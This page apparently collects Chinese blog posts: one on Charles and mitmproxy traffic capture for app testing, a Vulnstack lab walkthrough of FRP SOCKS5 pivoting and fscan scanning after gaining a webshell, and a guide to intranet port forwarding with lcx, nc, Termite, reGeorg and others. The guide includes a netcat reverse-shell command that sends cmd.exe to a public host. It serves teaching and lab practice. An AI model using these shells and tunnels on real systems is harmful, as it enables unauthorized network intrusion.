精华内容
下载资源
问答
  • 代理工具
    千次阅读
    2021-08-31 23:31:25

    一、常用代理工具

    常用代理工具   #1min52s
    代理工具:charles、burpsuite(黑客渗透测试工具)、fiddler(Windows)、mitmproxy
    高性能代理服务器:squid、dante
    #高性能代理服务器squid   公司通过squid缓存静态页面,让用户更高效的进行访问
    
    反向代理:nginx		 
    #反向代理服务器资源,把用户访问代理到其中一台服务器上
    正向代理代理客户端,反向代理代理服务器
    参考资料:   nginx 反向代理   https://www.cnblogs.com/ysocean/p/9392908.html
    
    优秀代理工具必备特性
    	代理功能:https/http、socks5
    	请求模拟工具:拼装请求、重放请求、重复请求
    	网络环境模拟:限速、超时、返回异常
    	mock:修改请求、修改响应
    	fake:用测试环境替代真实环境
    
    charles使用:
    1.配置抓取https协议接口
    	http/https抓包分析 Charles配置抓取https包 SSL proxying settings里进行配置
    2.https证书安装方式 
       https://ceshiren.com/t/topic/1105
    3.http/https抓包分析  获取证书并信任证书
    	抓取https包,需要获取证书并信任证书   chls.pro/ssl     5min45s
    	Android 6.0系统默认信任用户级别的证书  Android7.0 以上需要修改apk 包属性 14min18s
    4.抓包移动端修改app上的数据 16min 
    	通过rewrite设置修改response里的body内容,设置完成后刷新移动端页面查看
    5.通过抓包移动端,mock实践-数据加倍演示 20min16s,通过抓包移动端,mock实践-数据加倍演示 22min41s 操作步骤
    	通过map local来设置本地文件,设置项目里面host可以不填写(有时候host是ip,填写会有问题)数据加倍
    
    charles mock&fake
    1.修改雪球某一支股票为自定义名字,并修改价格
    2.修改雪球列表页股票的列表内容,修改为上千只股票
    
    http/https抓包分析:
    	Charles :
    		rewrite:		简单mock (通过rewrite修改响应body数据文案,有些样式根据数字正来做展示,比如股票涨为红色,跌为绿色。可以修改数字正负查看文案颜色是否正确)
    		map local:		复杂mock (通过map local来设置本地文件,设置项目里面host可以不填写(有时候host是ip,填写会有问题)数据加倍)
    		map remote:		整体测试环境		
    
    将数据中的某个字段重复排列出来,fake这部分,达到一条数据变成上千条数据展示
    	1.  raw=$(cat /tmp/stock.json)
        2.  重复多次执行:raw=$(echo $raw |jq ‘.data.items+=.data.items‘| jq ‘.data.items_size+=.data.items_size‘ )
        3.  echo $raw>newstock.json
        4.  charles中设置map local为newstock.json
    
    #使用map local实现数据加倍(本地json文件)
    raw=$(cat /tmp/stock.json)
    raw=$(echo $raw |jq '.data.items+=.data.items'| jq '.data.items_size+=.data.items_size' )
    

    #map local 使用的json文件格式如下
    ‘.data.items+=.data.items’在这里插入图片描述
    二、http协议详解

    http协议详解 curl命令参数 '2>&1' 将标准错误重定向到标准输出。4min11s
    
    请求与响应格式分析
    	1.F12选择api接口右键,选择'Copy->copy as curl',即可把请求内容转化为curl
    	2.将命令copy在gitbash或base上运行,则会看到返回信息
    	3.对上面命令进行细化,加入'-v'参数可以打印更详细的内容,用'2>&1'将标准错误重定向到标准输出,发送此命令将得到细化后的内容
    

    三、get、post区别实战详解

    get、post区别实战详解 post也可以发送query请求  7min33s 
    区别:
    	1.请求方法不一样
    	2.post请求头带了content-length和length-type。post可以附加body体
    

    四、session、cookie、token区别解析

    #参考链接 https://ceshiren.com/t/topic/1177  #启动一个flask demo,代码里面session_handle方法 用于分析区分session与cookie的区别
    
    #session、cookie、token区别解析  cookie与session区别  11min46s
    cookie与session的区别
    	cookie:浏览器接受服务器的Set-Cookie指令,并把cookie保存在电脑上,每个网站保存的cookie只作用于自己的网站
    	session:数据存储到服务器,只把关联数据的一个加密串放到cookie中标记
    
    #session、cookie、token区别解析  token应用场景 12min			
    token应用场景:
    	1.凭借认证信息获取token,或者通过后台配置好token
    	2.在相关请求中使用token,多数是以query参数的形态提供
    		参考OAuth认证、企业微信、微信、github、gitlab等相关认证
    			
    #session、cookie、token区别解析  session与token区别  17min
    session与token的区别
    	1.token是一个用户请求时附带的请求字段,用于验证身份与权限
    	2.session可以基于cookie,也可以基于query参数,用于关联用户相关数据
    	3.跨端应用的时候,比如安卓原生系统不支持cookie
    		需要用token识别用户
    		需要把sessionid保存到http请求中的header或者query字段中
    

    五、mock应用

    #后续补充实战内容
    mock应用 限速模拟 0min37s
    mock应用 交互式拦截请求与响应 1min25s
    mock应用 fake用测试环境替代线上环境 5min28s
    mock应用 fake用本地cache替代线上环境 7min23s
    

    六、雪球app抓包与mock实战1

    # home.testing-studio.com/t/topic/4520
    1.雪球app抓包与mock实战1 socket包通过charles抓不到,是因为socket在传输层,而Charles抓的是应用层,随着发展,Charles也可以抓取传输层的包,通过代理设置端口转发 14min44s
    
    2.雪球app抓包与mock实战1 如果手机没root,手机很难篡改hosts文件。Charles开启DNS代理,就可以模拟手机去访问hosts文件被修改之后的网站 20min
    
    3.雪球app抓包与mock实战1 配置charles抓包
    	打开Charles proxy settings 查看端口号,电脑配置Charles代理端口,同时Charles配置勾选Windows proxy,开启抓取   24min & 28min
    4.雪球app抓包与mock实战1  浏览器配置代理和Windows里面系统配置代理区别 37min10s
    	浏览器插件设置代理,属于浏览器专属代理
    5.curl命令被抓包程序抓取
    	雪球app抓包与mock实战1  curl 命令配置代理后可以让代理工具抓取 curl命令-x 参数配置代理地址 例如 curl www.baidu.com -x 127.0.0.1:8070 (8070为Charles proxy settings监听端口号)40min
    	同理,python中requests请求也可以被代理工具抓取,需要配置
    	同理,jmeter请求也可以被代理工具抓取,需要配置
    	...
    		
    6.不支持被代理工具抓取的应用:英雄联盟、腾讯课堂 41min08s
    反向代理可以解决部分应用不能被代理抓包 45min14s
    	应用支持篡改服务器目的地址也可以完成代理 ,将目的地址改为Charles监听的端口地址,Charles原封不动的进行转发 50min36s
    
    Charles配置反向代理 reverse proxies settings 53min13s	
    反向代理:charles转发:浏览器感受不到charles的存在
    	案例:将本地地址端口设置成远程端口
    #客户端也是把目标地址写在反向代理中
    
    反向代理应用场景:
    	微服务测试:通过charles设置反向代理进行应用
    

    案例:将本地地址端口设置成远程端口
    #charles设置反向代理,将本地8081端口访问定向到baidu.com
    #设置完成反向代理后,charles进行转发,本地再次访问http://127.0.0.1:8081时会进入baidu的官网
    #baidu.com是https协议,所以远程端口号为443
    charles设置反向代理,将本地8081端口访问定向到baidu.com
    七、雪球app抓包与mock实战2

    雪球app抓包与mock实战2 4min31s 	安装Charles证书 抓https包一定要去安装证书
    雪球app抓包与mock实战2 26min30s 	非对称加密和对称加密原理与区别
    雪球app抓包与mock实战2  			home.testing-studio.com/t/topic/4520
    

    八、雪球app抓包与mock实战3

    雪球app抓包与mock实站3 home.testing-studio.com/t/topic/4565
    雪球app抓包与mock实站3 sockets代理 8min 支持http,不支持ftp 。和http相比,不去关心代理采用的协议,比如多层网络模型,http只在乎应用层的协议。sockets代理不关心你采用的什么协议http、ftp,只在乎传输层用的tcp还是udp
    	sockets本质上是从应用层抓取的,只不过没关心用的什么协议
    雪球app抓包与mock实站3 21min20s cmd查找进程杀掉进程
    雪球app抓包与mock实站3 1h解释Charles可以抓https包是因为信任了证书,不是https安全性不高
    雪球app抓包与mock实站3 1h 07min45s  Charles截获curl命令
    	-x 代理 charles代理验证 
    	-k参数 证书验证
    雪球app抓包与mock实站3 1h 11min06s  cmd将乱码设置成utf8 CHCP 65001
    雪球app抓包与mock实站3 1h 22min11s  map remote使用介绍
    

    curl命令被maplocal截获
    curl https://www.baidu.com/ -x 127.0.0.1:8090 -k
    #-k参数 证书验证在这里插入图片描述
    九、雪球app抓包与mock实战4

    #参考链接 mitmproxy的使用详解  https://www.cnblogs.com/R-bear/p/15024809.html
    雪球app抓包与mock实站4 34min43s  mitmproxy使用介绍
    	安装 
    	pip install pipx
    	pipx install mitmproxy
    	
    雪球app抓包与mock实站4 39min35s  mitmproxy使用代理	
    雪球app抓包与mock实站4 41min38s  mitmproxy工具组成
    雪球app抓包与mock实站4 46min17s  web server监听8081 代理server监听8080
    雪球app抓包与mock实站4 54min22s  mitmproxy安装证书    #这一步需要前面就进行设置
    

    参考链接:https://www.cnblogs.com/R-bear/p/15024809.html
    mitmproxy安装证书
    在这里插入图片描述
    mitmproxy使用代理
    #mitmdump修改监听端口号在这里插入图片描述
    mitmproxy工具组成
    #mitmweb打开GUI页面
    mitmproxy -> 命令行工具(win不支持)
    mitmdump -> 加载 python 脚本
    mitmweb -> web 界面工具
    在这里插入图片描述
    web server监听8081 代理server监听8080
    在这里插入图片描述
    十、雪球app抓包与mock实战5

    雪球app抓包与mock实站5 0min30s mitmproxy录制,回放不通过代理
    雪球app抓包与mock实站5 1min40s mitmproxy回放内容过滤保存
    	-n 不使用代理
    	-C 回放
    雪球app抓包与mock实站5 1min40s mitmproxy使用脚本进行扩展 5min35s
    雪球app抓包与mock实站5 17min54s mitmproxy使用maplocal功能
    

    mitmproxy录制,回放不通过代理
    -n 不使用代理
    -C 回放在这里插入图片描述

    更多相关内容
  • 基于FRP反向代理工具实现内网穿透攻击

    千次阅读 热门讨论 2021-07-14 20:00:38
    文章目录前言FRP反向代理内网环境搭建服务端的配置...Webshell 管理工具——冰蝎直接设置 HTTP 隧道代理实现内网穿透:2021强网杯全国网络安全挑战赛Writeup; Cobaltstrike 建立 Socks4 代理实现内网穿透:Cobaltstrik

    前言

    当我们拿下目标单位的一台外网服务器后,需要借助外网服务器作为跳板机去开展内网渗透,这个时候必不可少的就是在跳板机上设置代理。在前面的文章中,曾经在实际案例中介绍了两种代理方式:

    1. Webshell 管理工具——冰蝎直接设置 HTTP 隧道代理实现内网穿透:2021强网杯全国网络安全挑战赛Writeup
    2. Cobaltstrike 建立 Socks4 代理实现内网穿透:Cobaltstrike内网渗透神器入门使用教程

    以上两种代理方式虽均能实现内网穿透的目的,但是代理质量相对来说并不稳定,难以满足内网渗透的需求。本文将介绍一个专注于内网穿透的高性能的反向代理应用——FRP,其支持 TCP、UDP、HTTP、HTTPS 等多种协议,可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。

    FRP反向代理

    FRP 的 中文官方文档 可了解其作用和用法。

    简而言之,FRP 通过在具有公网 IP 的节点上部署 frp 服务端,可以轻松地将内网服务穿透到公网,同时提供诸多专业的功能特性,这包括:

    1. 客户端服务端通信支持 TCP、KCP 以及 Websocket 等多种协议。
    2. 采用 TCP 连接流式复用,在单个连接间承载更多请求,节省连接建立时间。
    3. 代理组间的负载均衡。
    4. 端口复用,多个服务通过同一个服务端端口暴露。
    5. 多个原生支持的客户端插件(静态文件查看,HTTP、SOCK5 代理等),便于独立使用 frp 客户端完成某些工作。
    6. 高度扩展性的服务端插件系统,方便结合自身需求进行功能扩展。
    7. 服务端和客户端 UI 页面。

    内网环境搭建

    本文将借助以下靶场环境进行 FRP 工具实现内网穿透的实验演示:
    在这里插入图片描述
    没错,以上环境基于红日安全 Vulnstack 内网靶场环境,详情可参见Vulnstack红日安全内网域渗透靶场1实战

    1、由于虚拟机仅主机模式下默认是可与物理机连通的,故在 Win2008 域控主机上,防火墙新建了如下入站规则来拒绝 Win10 物理机的访问(禁止访问的 IP 为物理机的仅主机模式 VMnet1 网卡的网关 192.168.52.1):
    在这里插入图片描述2、此时 Win7 跳板机访问 Win2008 的 80 端口 Web 服务是正常的:
    在这里插入图片描述3、但是“外网”角色的 Win10 物理机则无法正常访问 Win2008 的 Web 服务:
    在这里插入图片描述4、而同样是与物理机做了仅主机模式网络连接的 Win2003 虚拟机,由于没有做防火墙策略,Win10 物理机是可以直接连通的:
    在这里插入图片描述
    以上就是本次实验的演示环境,接下来我的目标就是借助 FRP 反向代理工具,实现 Win10 物理机通过 Win7 跳板机的代理成功访问到内网 Win2008 的 Web 服务!

    服务端的配置

    FRP 代理工具可以直接在 Github下载
    在这里插入图片描述从下图的 frp 架构图可以看出 frp 的工作流程——在服务端部署 frps,在要访问的 内网机器(或者跳板机)上部署 frpc,实现服务端对该主机的反向代理,接着便可以通过访问服务端来实现对该内网主机的远程访问(或者借助跳板机访问内网):
    在这里插入图片描述
    1、下载 frp_0.37.0_linux_amd64.tar.gz 并传输到 VPS 服务器上后解压缩获得如下文件:
    在这里插入图片描述其中的关键文件如下:

    ├── frpc          #frp客户端执行程序
    ├── frpc_full.ini 
    ├── frpc.ini      #frp客户端配置文件
    ├── frps          #frp服务端执行程序
    ├── frps_full.ini
    ├── frps.ini      #frp服务端配置文件
    └── LICENSE
    

    2、frp 服务默认不设置连接密码,frps.ini 文件默认只设置了端口:
    在这里插入图片描述
    我们可以修改服务端配置文件frps.ini来配置代理的连接密码,如下图所示:
    在这里插入图片描述
    3、执行命令./frps -c ./frps.ini开始运行 FRP 服务:
    在这里插入图片描述

    客户端的配置

    1、将对应版本的 FRP 工具下载到 Win7 跳板机上并解压缩,客户端配置文件frpc.ini初识参数如下:
    在这里插入图片描述2、同样的修改 FRP 客户端配置文件frpc.ini来设置服务端的 IP 地址、端口、连接密码:
    在这里插入图片描述
    参数释义:

    [common]
    server_addr = 104.168.***.*** #VPS服务器的 IP
    server_port = 7000            #VPS服务器上设置的 FRP 服务绑定端口
    token = ftp1234               #VPS服务端设置的 FRP 服务连接密码
    
    [socks5]      #这个是反向代理的名称,可以随意设置
    type = tcp    #socks5 是 TCP 协议的
    remote_port = 6666   #指定建立的反向代理的连接端口
    plugin = socks5      #指定建立 socks5 代理隧道
    use_encryption = true
    use_compression = true
    

    3、接下来执行命令frpc.exe -c frpc.ini启动客户端即可:
    在这里插入图片描述

    4、此时查看 VPS 服务器监听的 7000 端口已成功与客户端连接,同时开启了 6666 端口并建立了 socks5 代理通道:
    在这里插入图片描述

    FRP内网穿透

    配置完 FRP 服务端和客户端并建立起 socks5 隧道后,下面就来见证下利用该 FRP 代理隧道如何穿透内网!

    1、在 Win10 物理机的谷歌浏览器设置如下代理:
    在这里插入图片描述2、然后让 Win10 的谷歌浏览器流量走 VPS 建立的 FRP socks5 代理,即可访问到内网域控主机的 Web 服务,成功实现内网穿透!
    在这里插入图片描述返回 VPS 也能查看到对应流量转发的信息:
    在这里插入图片描述3、以上除了在浏览器直接连接 frp 的 socks5 代理外,在实际渗透过程中为了结合 BurpSsuite 对内网 Web 系统进行抓包测试,还可以在浏览器连接 BurpSuite 代理,并在 BurpSuite 中设置流量走 frp 服务器的 socks5 代理即可,如下图所示:
    在这里插入图片描述4、此时谷歌浏览器挂着 BurpSuite 的代理便可以访问到内网的服务了:
    在这里插入图片描述同时 BurpSuite 也能抓到内网服务的数据包了:
    在这里插入图片描述至此已成功借助 frp 搭建 socks5 代理隧道、实现内网穿透的目的!

    FRP进阶使用

    上文搭建的 socks5 隧道用于将公网主机(本文代指 Win10 物理机)访问内网服务器的请求流量直接通过访问 Win7 跳板机转发,从而实现内网穿透的目的。

    FRP 反向代理还可以将内网主机的 22、3389 等端口转发到公网主机的指定端口,从而实现远程连接内网服务器的目的,如下图所示:
    在这里插入图片描述
    相关用法请参见前文提及的 FRP 的 中文官方文档,此处不再演示。

    fscan内网神器

    此处搞点跟本文题目无关的题外知识hh,某次攻防演习看到同事使用了 fscan 扫描内网的服务,被秀了一把,不得不感叹真香!在此顺便借助该靶场环境记录下该工具的用法。

    Fscan 工具的 Github 项目地址,有使用说明:
    在这里插入图片描述

    可直接下载:
    在这里插入图片描述简单用法:
    在这里插入图片描述下面来体验下该工具,看看实际的使用效果!

    1、拿到 Win7 跳板机的 Shell:
    在这里插入图片描述2、上传 fscan64.exe 文件到跳板机上:
    在这里插入图片描述3、在 Cknife 中打开命令终端,执行命令fscan64.exe -h 192.168.52.0/24 -o result.txt,进行内网信息探测:
    在这里插入图片描述
    4、下载并打开程序运行结果 result.txt,可以看到如下搜集到的全面的内网信息:
    在这里插入图片描述附上所有结果:

    192.168.52.138:445 open
    192.168.52.143:139 open
    192.168.52.138:88 open
    192.168.52.141:7001 open
    192.168.52.143:3306 open
    192.168.52.141:445 open
    192.168.52.143:445 open
    192.168.52.141:139 open
    192.168.52.138:139 open
    192.168.52.143:135 open
    192.168.52.141:135 open
    192.168.52.141:21 open
    192.168.52.143:80 open
    192.168.52.138:80 open
    192.168.52.141:8099 open
    192.168.52.141:7002 open
    192.168.52.138:135 open
    192.168.52.141:8098 open
    NetInfo:
    [*]192.168.52.143
       [->]stu1
       [->]192.168.52.143
       [->]169.254.129.186
       [->]192.168.92.130
    NetInfo:
    [*]192.168.52.138
       [->]owa
       [->]192.168.52.138
    [*] 192.168.52.143       __MSBROWSE__\STU1              Windows 7 Professional 7601 Service Pack 1
    [+] 192.168.52.143	MS17-010	(Windows 7 Professional 7601 Service Pack 1)
    NetInfo:
    [*]192.168.52.141
       [->]root-tvi862ubeh
       [->]192.168.52.141
    [*] WebTitle:http://192.168.52.141:7002 code:200 len:2632   title:Sentinel Keys License Monitor
    [*] 192.168.52.141       GOD\SNTL_ROOT-TVI86   
    [+] 192.168.52.138	MS17-010	(Windows Server 2008 R2 Datacenter 7601 Service Pack 1)
    [*] 192.168.52.138 [+]DC GOD\OWA               Windows Server 2008 R2 Datacenter 7601 Service Pack 1
    [+] 192.168.52.141	MS17-010	(Windows Server 2003 3790)
    [*] WebTitle:http://192.168.52.138     code:200 len:4      title:IIS7
    [*] WebTitle:http://192.168.52.141:8099 code:403 len:1409   title:The page must be viewed over a secure channel
    [*] WebTitle:http://192.168.52.143     code:200 len:21     title:phpStudy 探针 2014
    [+] ftp://192.168.52.141:21:anonymous 
    

    可以看到,扫描结果里包括了几大类信息:

    1. 扫描的内网网段里存活的主机 IP 及其开放的端口;
    2. 扫描的内网网段里主机的名称、MS17-010 永恒之蓝等漏洞扫描结果(两台主机存在该漏洞);
    3. 扫描的内网网段里主机开放的 Web 服务的标题、端口地址!

    此处验证下扫描到的几个内网 Web 服务是否真实存在:
    在这里插入图片描述在这里插入图片描述在这里插入图片描述看到这,你应该明白 fscan 这款内网神器有多香了吧!收集到如此多的内网资产信息,接下来的内网横向渗透就更加简便清晰了!

    总结

    本文学习、总结了内网穿透神器 FRP 反向代理工具的使用方法,同时介绍了 fscan 内网资产情况扫描神器的使用。在实际的攻防演习、内网渗透中,拿到外网跳板机的 Shell 权限后,我们可以使用 fscan 在跳板机上扫描内网进行资产搜集,然后使用 FRP 进行内网穿透后对收集到的内网资产进行横向渗透攻击!

    展开全文
  • 理论上,任何接入互联网的计算机都是可访问的,但是如果目标主机处于内网,而我们又想和该目标主机进行通信的话,就需要借助一些端口转发工具来达到我们的目的 注:文中提到的所有工具下载地址...

    目录

    一、LCX

    二、nc 反弹

    三、socks代理工具

    四、frp 内网穿透利器

    五、ngrok 内网穿透


    理论上,任何接入互联网的计算机都是可访问的,但是如果目标主机处于内网,而我们又想和该目标主机进行通信的话,就需要借助一些端口转发工具来达到我们的目的

    注:文中提到的所有工具下载地址 GitHub - Brucetg/Pentest-tools: 内网渗透工具

    一、LCX

    lcx.exe是一个端口转发工具,有Windows版和Linux版两个版本,Windows版是lcx.exe,Linux版为portmap,

    Windows版使用方法如下:

    lcx有两大功能:

    1)端口转发(listen和slave成对使用)

    2)端口映射(tran)

    1、lcx 内网端口转发

    1.内网主机上执行:lcx.exe –slave 公网主机ip 公网主机端口 内网主机ip 内网主机端口

    例如:

    lcx.exe -slave 公网主机ip 4444 127.0.0.1 3389
    

    意思是把内网主机的 3389 端口转发到具有公网ip主机的 4444 端口

    2.公网主机 上执行 Lcx.exe –listen 公网主机端口1 公网主机端口2

    例如:

    lcx.exe –listen 4444 5555
    

    意思是监听公网主机本机的 4444 端口请求,并将来自 4444 端口的请求传送给 5555 端口。

    此时,RDP 连接,Windows 命令行下输入mstsc,即可打开远程桌面连接:

    内网渗透之端口转发与代理

    如果是在公网主机上操作,计算机那栏只需要输入 127.0.0.1:5555,即可;如果是在本地主机上操作,则输入 公网主机ip:5555 ,然后输入用户名和密码,即可连接到内网主机。

    2、本地端口转发

    由于防火墙限制,部分端口如3389无法通过防火墙,此时可以将该目标主机的3389端口透传到防火墙允许的其他端口,如53端口,

    目标主机上执行:

    lcx -tran 53 目标主机ip 3389
    

    这时我们可以直接远程桌面连接到到 目标主机IP:53

    注:软件可能会被杀软查杀,可自行寻找免杀版本。

    Linux版使用方法:

    例如:

    先在具有公网ip的主机上执行:

    ./portmap -m 2 -p1 6666 -h2 公网主机ip -p2 7777
    

    意思是监听来自6666端口的请求,将其转发到7777端口

    再在内网主机上执行:

    ./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 公网主机ip -p2 6666
    

    意思就是将内网主机22端口的流量转发到公网主机的6666端口。

    然后在Linux系统命令行下执行

    ssh 公网主机ip 7777
    

    即可连接内网主机。

    二、nc 反弹

    nc使用方法:

    反向连接

    在公网主机上进行监听:

    nc -lvp 4444
    

    内网渗透之端口转发与代理

    在内网主机上执行:

    nc -t -e cmd.exe 公网主机ip 4444
    

    上述命令中 -t 参数是指通过telnet模式执行cmd.exe,可省略。

    成功后即可得到一个内网主机的cmd shell。

    正向连接

    远程主机上执行:

    nc -l -p 4444 -t -e cmd.exe
    

    本地主机上执行:

    nc -vv 远程主机ip 4444
    

    成功后,本地主机就获得了远程主机的一个cmd shell。

    三、socks代理工具

    1). Termite 是EW(EarthWorm)的最新版,官方链接: Termite

    主要特性: 多平台支持、跳板机互联、正反向级联、小巧无依赖、内置Shell令主机管理更方便

    使用方法,以Windows平台为例:

    管理端:

    客户端:

    客户端执行:

    agent_windows_x86.exe -l  4444
    

    管理端执行:

    admin_windows_x86.exe -c 127.0.0.1 -p 4444
    

    将新的agent加入拓扑:

    agent_windows_x86.exe -c 127.0.0.1 -p 4444
    

    具体使用方法可参考: http://rootkiter.com/Termite/README.txt

    Usage

    1.以服务模式启动一个agent服务。

    $ ./agent -l 8888

    2.令管理端连接到agent并对agent进行管理。

    $ ./admin -c 127.0.0.1 -p 8888

    3.此时,admin端会得到一个内置的shell, 输入help指令可以得到帮助信息。

    help

    4.通过show指令可以得到当前agent的拓扑情况。

    show 0M +– 1M 由于当前拓扑中只有一个agent,所以展示结果只有 1M , 其中1 为节点的ID号, M为MacOS系统的简写,Linux为L,Windows简写为W。

    5.将新agent加入当前拓扑

    ./agent -c 127.0.0.1 -p 8888

    6.此时show指令将得到如下效果 0M +– 1M | +– 2M 这表明,当前拓扑中有两个节点,其中由于2节点需要通过1节点才能访问,所以下挂在1节点下方。

    7.在2节点开启socks代理,并绑定在本地端口

    goto 2 将当前被管理节点切换为 2 号节点。socks 1080 此时,本地1080 端口会启动个监听服务,而服务提供者为2号节点。

    8.在1号节点开启一个shell并绑定到本地端口

    goto 1shell 7777 此时,通过nc本地的 7777 端口,就可以得到一个 1 节点提供的 shell.

    9.将远程的文件下载至本地

    goto 1downfile 1.txt 2.txt 将1 节点,目录下的 1.txt 下载至本地,并命名为2.txt

    10.上传文件至远程节点

    goto 2upfile 2.txt 3.txt 将本地的 2.txt 上传至 2号节点的目录,并命名为3.txt

    11.端口转接

    goto 2 lcxtran 3388 10.0.0.1 3389 以2号节点为跳板,将 10.0.0.1 的 3389 端口映射至本地的 3388 端口

    2). reGeorg 工具地址: GitHub - sensepost/reGeorg: The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.

    reGeorg 是 reDuh 的升级版,主要是把内网服务器的端口通过 http/https 隧道转发到本机,形成一个回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。它利用 webshell 建立一个 socks 代理进行内网穿透,服务器必须支持 aspx、php 或 jsp 这些 web 程序中的一种。

    使用方法(详见github):

    3). sSocks 工具地址: sSocks (Socks5 Server) download | SourceForge.net

    sSocks是一个socks代理工具套装,可用来开启socks代理服务,支持socks5验证,支持IPV6和UDP,并提供反向socks代理服务,即将远程计算机作为socks代理服务端,反弹回本地,极大方便内网的渗透测试,其最新版为0.0.14

    下载解压后,执行命令编译。

    ./configure && make
    

    (这里我提供的压缩包中该软件是已经编译好的!)

    编译完成,进入src目录,会发现有nsocks、ssocksd、ssocks、rcsocks,其功能说明介绍如下:

    程序功能:

    nsocks 类似通过Socks5代理后的netcat,可用来测试socks server ssocksd 用来开启Socks5代理服务 ssocks 本地启用Socks5服务,并反弹到另一IP地址 rcsocks 接收反弹过来的Socks5服务,并转向另一端口

    公网主机使用 rcsocks
    内网主机使用 rssocks

    使用示例:

    假设 公网主机ip是 192.168.50.202

    192.168.50.202 公网主机上执行:

    ./rcsocks -l 4444 -p 5555 -vv
    

    5555 是内网主机 使用 rssocks 连接的端口

    4444 是代理端口 用作代理服务器  但真正执行代理功能的是 内网主机 具体代理流程是

    我的电脑 -> 公网主机 4444端口 -> 内网主机 -> 我需要访问的网站

    内网主机上执行:

    ./rssocks -s 192.168.50.202:5555 -vv
    

    这时本地主机可以通过访问公网主机的 4444 端口访问内网主机。

    4). proxychains 工具地址址:ProxyChains - TCP and DNS through proxy server. HTTP andSOCKS

    Ubuntu 下可直接执行以下命令安装:

    sudo apt-get update
    
    sudo apt-get install proxychains
    

    Proxychains 是一款 LINUX 平台下可以实现全局代理的软件,性能相当稳定可靠。在使任何程序通過代理上网,允許 TCP 和 DNS 通過代理隧道,支持 HTTP、SOCKS4、SOCKS5 類型的代理服务器,支持 proxy chain,即可配置多个代理,同一個 proxy chain 可使用不同类型的代理服务器。

    网上有很多该工具的使用介绍,请自行根据需要查找。

    5). Tunna 工具地址: GitHub - SECFORCE/Tunna: Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments.

    该工具使用的先决条件:

    能够在远程服务器上上传webshell
    

    使用方法:

    python proxy.py -u <remoteurl> -l <localport> [options]
    

    options:

    --help, -h 显示此帮助信息并退出
    
    --url=URL, -u URL 为远程webshel​​l的URL
    
    --lport=LOCAL_PORT, -l LOCAL_PORT代表本地侦听端口
    
    --verbose, -v 详细(输出数据包大小)
    
    --buffer=BUFFERSIZE, -b BUFFERSIZE* HTTP请求大小(一些网站对大小有限制)
    

    No SOCKS Options:

    如果使用SOCKS代理,选项将被忽略

    --no-socks, -n 不使用 Socks 代理
    
    --rport=REMOTE_PORT, -r    REMOTE_PORT远程服务端口,供webshel​​l连接
    
    --addr=REMOTE_IP, -a REMOTE_IP 远程webshel​​l连接到的地址(默认为 127.0.0.1)
    

    上游代理选项:

    通过本地代理进行隧道连接

    --up-proxy=UPPROXY, -x UPPROXY上游代理(http://proxyserver.com:3128)
    
    --auth, -A 上游代理需要认证
    

    高级选项:

    --ping-interval=PING_DELAY, -q PING_DELAY webshprx pinging线程间隔(默认值为0.5)
    
    --start-ping, -s 首先启动ping线程 - 一些服务首先发送数据(例如,SSH)
    
    --cookie, -C 请求cookies
    
    --authentication, -t 基本认证
    

    使用方法示例:

    内网主机为Windows:

    python proxy.py -u http://10.3.3.1/test/conn.aspx -l 4444 -r 3389 -v
    

    其中:

    -l 表示本地监听的端口

    -r 远程要转发的端口

    -v 详细模式

    如果内网主机为Linux,则可以将22端口转发出来,更详细的使用方法请参考github上面的说明。

    四、frp 内网穿透利器

    frp 是一个可用于内网穿透的高性能的反向代理应用,支持 tcp, udp, http, https 协议。

    工具地址: GitHub - fatedier/frp: A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.

    frp 的作用

    利用处于内网或防火墙后的机器,对外网环境提供 http 或 https 服务。

    对于 http, https 服务支持基于域名的虚拟主机,支持自定义域名绑定,使多个域名可以共用一个80端口。

    利用处于内网或防火墙后的机器,对外网环境提供 tcp 和 udp 服务,例如在家里通过 ssh 访问处于公司内网环境内的主机。

    Windows平台文件目录如下:

    其中frpc.ini和frpc_full.ini都为客户端配置文件,其中frpc_full.ini包括所有配置信息,我们可参考它来修改frpc.ini文件作为我们的配置文件,同理,frps.ini为服务器端配置文件。

    frp服务端配置文件示例:

    #frps.ini    
    
    [common]
    bind_addr = 0.0.0.0
    bind_port = 7000
    vhost_http_port = 80
    vhost_https_port = 443
    dashboard_port = 7500
    dashboard_user = {username}
    dashboard_pwd = {password}
    
    privilege_mode = true
    privilege_token = {privilege_token}
    
    [http]
    type = http
    auth_token = {auth_token}
    custom_domains = {cudtom_domains}
    
    [https]
    type = https
    auth_token = {auth_token}
    custom_domains = {custom_domains}
    

    实际使用时请将上述配置中的花括号处内容替换为自己的配置。比如将 {username} 替换为 admin。

    启动frp服务器端:

    frps.exe -c frps.ini
    

    浏览器访问: 127.0.0.1:7500,输入frps.ini中配置的用户名和密码即可进入控制面板:

    frp客户端配置示例:

    #frpc.ini
    
    [common]
    server_addr = xxx
    server_port = 7000
    auth_token = {auth_token}
    privilege_token = {privilege_token}
    
    [http]
    type = http
    local_ip = 127.0.0.1
    local_port = 80
    
    [https]
    type = https
    local_ip = 127.0.0.1
    local_port = 443
    
    [ssh]
    type = tcp
    local_port = 22
    remote_port = 5555
    

    注意frp客户端和服务端的 auth_token 和 privilege_token 等要保持一致。

    启动frp客户端:

    frpc.exe -c frpc.ini
    

    更多使用方法详见 frp/README_zh.md at master · fatedier/frp · GitHub

    五、ngrok 内网穿透

    工具地址: ngrok - download

    ngrok支持Windows、Linux、Mac OS X等多个平台,可自行选择需要的版本来下载使用

    分为免费版本和收费版本:

    使用方法:

    这里仅简单演示下Windows平台上的使用:

    首先在内网主机上执行(内网主机需安装Python):

    python -m SimpleHTTPServer 8089
    

    我这里在Windows下用Python 2.7来演示,就执行:

    py -2 -m SimpleHTTPServer 8089
    

    将ngrok上传至内网主机并启动ngrok:

    ngrok.exe http 8089
    

    这时我们只需要在浏览器中访问:

    http://cdb0e21b.ngrok.io
    或者
    
    https://cdb0e21b.ngrok.io
    
    

    即可通过HTTP或者HTTPS来访问内网主机上的文件。

    当然ngrok还有很多其他功能,更多使用方法请参考官方文档: ngrok – documentation

    展开全文
  • 代理工具介绍

    千次阅读 2020-03-28 19:13:02
